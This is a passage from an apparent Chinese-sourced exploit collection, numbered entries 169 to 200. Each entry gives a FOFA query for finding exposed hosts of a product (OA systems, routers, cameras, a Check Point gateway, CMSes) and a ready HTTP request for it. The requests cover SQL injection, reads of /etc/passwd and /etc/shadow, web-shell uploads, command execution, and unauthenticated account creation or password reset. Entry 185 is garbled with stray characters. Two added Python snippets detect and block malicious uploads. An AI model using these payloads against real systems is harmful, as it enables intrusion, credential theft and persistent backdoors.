GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
Same /templates/attestation/../../ prefix as entry 169; the filename parameter is then read relative to the application directory.
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA: body="/808gps/"
Time-based blind (MySQL SLEEP) on the ids parameter; the ;downloadLogger.action suffix is a path-parameter trick used to get past the URL filter.
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
Send the request line raw (curl --path-as-is or a socket); browsers and most HTTP libraries collapse the ../ segments before sending.
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
Affects gateways with the Remote Access VPN or Mobile Access blade enabled; the read is privileged enough to return /etc/shadow, so treat any hit as credential exposure.
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
Time-based blind (SQL Server WAITFOR DELAY) on the IncentiveID parameter.
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
The part is named tmp_name and declares image/png, but the .php name is kept; the uploadtime field is sent empty.
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
The device configuration file is fetched through the login page path with .. segments that the web server does not normalise. The file name is the router model, so request the one matching the target (or each in turn). Keep the .. segments literal (curl --path-as-is); HTTP clients collapse them otherwise.
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
The %2e%2e in the path steps out of /imc/primepush/ to reach the unauthenticated flexFileUpload handler; the stored file takes its name from the part's name attribute (12234.txt), not from filename.
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Verify with:
GET /imc/primepush/%2e%2e/flex/12234.txt
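The upload entries above (155, 157, 161, 162, 163, 164, 176, 178) rely on a handful of tricks: a server-side script extension behind an image Content-Type, a script opening tag in the file body, ../ in the file name, or a plain form field that carries the script name. The following is an added example written for this post, not code from the original article or from any vendor listed; it parses a multipart body with a small hand-rolled parser and reports which of those tricks a request uses, which is the check to run on an upload log or a WAF capture. The boundary, field names and bodies are constructed to mirror the requests above, and the extension and marker lists are assumptions to extend for your own stack.

```python
import re

# Extensions the PoCs above upload to get code execution; an assumed starter list, extend per stack.
EXEC_EXT = {"php", "php3", "php5", "phtml", "jsp", "jspx", "asp", "aspx", "asmx", "ashx", "cfm", "cfml"}
IMAGE_EXT = {"png", "jpg", "jpeg", "gif", "bmp", "webp"}
# Opening tags of the web shells in entries 155, 162, 164 and 176 (PHP, ASP, ASP.NET).
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<%|<script\b[^>]*\brunat=", re.I)


def parse_multipart(body: bytes, boundary: str) -> list:
    """Minimal multipart/form-data parser (RFC 7578 subset): one dict per part."""
    delimiter = b"--" + boundary.encode("ascii")
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):            # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):          # CRLF that ends the delimiter line
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):             # CRLF before the next delimiter is syntax, not content
            data = data[:-2]
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.partition(b":")
            headers[key.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
        disposition = headers.get("content-disposition", "")
        name = re.search(r'\bname="([^"]*)"', disposition)
        filename = re.search(r'\bfilename="([^"]*)"', disposition)
        parts.append({
            "name": name.group(1) if name else "",
            "filename": filename.group(1) if filename else None,
            "content_type": headers.get("content-type", ""),
            "data": data,
        })
    return parts


def assess_upload(body: bytes, boundary: str) -> list:
    """Return (field name, reason) pairs for the upload tricks used by the PoCs in this list."""
    findings = []
    for part in parse_multipart(body, boundary):
        filename = part["filename"]
        if filename is None:
            # Plain field: a value that is itself a script file name (entry 163 sends name=1.php).
            value = part["data"].decode("latin-1").strip()
            if "." in value and value.rsplit(".", 1)[1].lower() in EXEC_EXT:
                findings.append((part["name"], "field value names a server-side script"))
            continue
        ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
        if ext in EXEC_EXT:
            findings.append((part["name"], "executable extension ." + ext))
        if ".." in re.split(r"[\\/]+", filename):
            findings.append((part["name"], "path traversal in filename"))
        if SCRIPT_MARKERS.search(part["data"]):
            findings.append((part["name"], "script marker in file body"))
        if part["content_type"].lower().startswith("image/") and ext not in IMAGE_EXT:
            findings.append((part["name"], "declared image type does not match extension"))
    return findings


BOUNDARY = "AaB03x"
# Constructed bodies (not captured traffic) shaped like the requests in entries 155, 164 and 163.
PHP_IN_PNG = (
    b"--AaB03x\r\n"
    b'Content-Disposition: form-data; name="file"; filename="test.php"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"<?php phpinfo();unlink(__FILE__);?>\r\n"
    b"--AaB03x--\r\n"
)
ASPX_IN_JPEG = (
    b"--AaB03x\r\n"
    b'Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b'<%@Page Language="C#"%><%Response.Write("x");%>\r\n'
    b"--AaB03x--\r\n"
)
NAME_FIELD_TRICK = (
    b"--AaB03x\r\n"
    b'Content-Disposition: form-data; name="name"\r\n\r\n'
    b"1.php\r\n"
    b"--AaB03x\r\n"
    b'Content-Disposition: form-data; name="upfile"; filename="1.php"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"rvjhvbhwwuooyiioxega\r\n"
    b"--AaB03x--\r\n"
)
BENIGN = (
    b"--AaB03x\r\n"
    b'Content-Disposition: form-data; name="avatar"; filename="photo.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\r\n"
    b"--AaB03x--\r\n"
)

if __name__ == "__main__":
    for label, body in [("155", PHP_IN_PNG), ("164", ASPX_IN_JPEG), ("163", NAME_FIELD_TRICK), ("benign", BENIGN)]:
        print(label, assess_upload(body, BOUNDARY))
```

The Content-Type declared by the client is never trusted on its own: the image/png and image/jpeg declarations in the PoCs are exactly what the vulnerable handlers check, so the example reports them only as a mismatch against the extension and looks at the bytes for the script tag instead.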

179. 建文 engineering management system arbitrary file read
The path parameter is read relative to the download directory without normalisation.
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
Error-based (MySQL updatexml) on the xu parameter; the result of the inner query (user() here) is returned between the 0x7e (~) markers in the error message.
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申 enterprise standardisation management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
Time-based blind (SQL Server WAITFOR DELAY) on the start parameter.
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申 enterprise standardisation management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
The action=Adduser handler creates an account from the posted fields without authentication.
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
Error-based (Oracle ctxsys.drithsx.sn) on the token parameter; decoded, token is 1'and ctxsys.drithsx.sn(1,(select 111111*111111 from dual))='2. The endpoint is a password-update call, so probe it with a loginid that does not exist rather than a real account.
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
The request body is a raw SQL statement that the endpoint executes as-is, so the caller chooses every column, including PURVIEW (privilege level); a successful request leaves a persistent account on the gateway.
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

: T$ D- E0 D2 P' N/ W/ \- [& U) B5 P185. 瑞友天翼应用虚拟化系统SQL注入
* O& f2 z) v' ]# i0 xversion < 7.0.5.1
. v. R6 ?5 t- m+ {: G# g* p' U' j0 JFOFA:app="REALOR-天翼应用虚拟化系统", s( @3 j' F8 M) G+ S6 q8 U
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
6 D! `$ f% N* Q  RHost: host3 \0 b3 ?  N* C2 b6 e
8 \) d: r0 G$ e8 L% e
* t7 O9 R6 W! ]
186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA: title=="DataCube3"
Time-based blind for SQLite: RANDOMBLOB(500000000/2) forces a heavy computation instead of a sleep, so a slow response on req_id confirms the injection.
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection (time-based form of entry 158)
CVE-2024-32640
FOFA: "Mura CMS"
The %5c (backslash) escapes the quote that the application adds, so the injected SLEEP(5) runs; a five-second delay confirms it.
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
The file parameter takes an absolute path, so no traversal sequence is needed.
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA: body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA: body="山石云鉴主机安全管理系统"
Step 1: fetch a CSRF token for the (unauthenticated) session cookie used below; substitute it for {{token}} in step 2.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


Step 2: the param value is evaluated server-side; the PoC writes a marker file under the web root.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config');


Step 3: read the marker back over HTTP to confirm execution.
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present. The filename field carries a path traversal, so the JSP is written into the deployed fe.war rather than the attachment directory.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

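Several uploads in this list (items 192, 194, 199, 202 and 203) get through because the server trusts the client-supplied filename, extension or Content-Type: a traversal in the filename, a .jsp or .php extension, or a JSP body labelled image/jpeg. The following is an added example, not code from the original article or from any of the products above; it shows the vulnerable join beside a hardened handler, assuming a hypothetical upload root and extension allow-list:

```python
import posixpath
import re
from typing import FrozenSet, Optional

# Extensions this hypothetical upload handler is willing to store (an assumption for the example).
ALLOWED_EXT: FrozenSet[str] = frozenset({".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"})

# Leading bytes a file must start with for the extension it claims. The client's Content-Type
# header is never consulted (item 203 above labels a .jsp body as image/jpeg).
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF-",),
}

# Stem may not contain a dot, so "shell.php.txt" and dotfiles are rejected as a side effect.
_SAFE_STEM = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$")


def vulnerable_upload_path(upload_root: str, client_filename: str) -> str:
    """The pattern the PoCs above abuse: the client-controlled name is joined verbatim,
    so '../../../../../jboss/web/fe.war/hello.jsp' lands inside the web application."""
    return posixpath.join(upload_root, client_filename)


def safe_upload_path(upload_root: str, client_filename: str,
                     allowed_ext: FrozenSet[str] = ALLOWED_EXT) -> Optional[str]:
    """Return the path to store the file at, or None if the name must be rejected."""
    # Keep only the last path component, whichever separator the client used.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    stem, ext = posixpath.splitext(name)
    ext = ext.lower()
    if not stem or not ext or ext not in allowed_ext or not _SAFE_STEM.match(stem):
        return None
    root = posixpath.normpath(upload_root)
    dest = posixpath.normpath(posixpath.join(root, stem + ext))
    # Belt and braces: even after the name checks, the result must sit directly in the root.
    # A real handler should also realpath() the written file to catch symlinked directories.
    if posixpath.dirname(dest) != root:
        return None
    return dest


def accept_upload(upload_root: str, client_filename: str, data: bytes) -> Optional[str]:
    """Name check plus content sniffing: a file claiming an image extension must look like one."""
    dest = safe_upload_path(upload_root, client_filename)
    if dest is None:
        return None
    ext = posixpath.splitext(dest)[1]
    signatures = MAGIC.get(ext)
    if signatures and not any(data.startswith(sig) for sig in signatures):
        return None
    return dest
```

The extension allow-list does the heavy lifting; the traversal strip and the directory check are there so that a later change to the allow-list cannot reopen the path problem, and the magic-byte check closes the "JSP with an image Content-Type" trick from item 203.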
195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. aliyundrive-webdav (阿里云盘 WebDAV) command injection
CVE-2024-29640
The request carries a LuCI sysauth session cookie, so an authenticated session is required. The sid value URL-decodes to `ls />/www/aaa.txt`, which writes the listing of / into the web root, where it can then be fetched over HTTP.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload file upload
FOFA: title="Authenticate Please!"
This is a post-authentication upload: the PoC logs in with admin/admin, so it only applies where default or otherwise known credentials work.

1. Request the login page to obtain the CSRF token (csfr), then log in to obtain a session cookie, then upload and fetch the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to log in and obtain the session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path: /storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA: app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

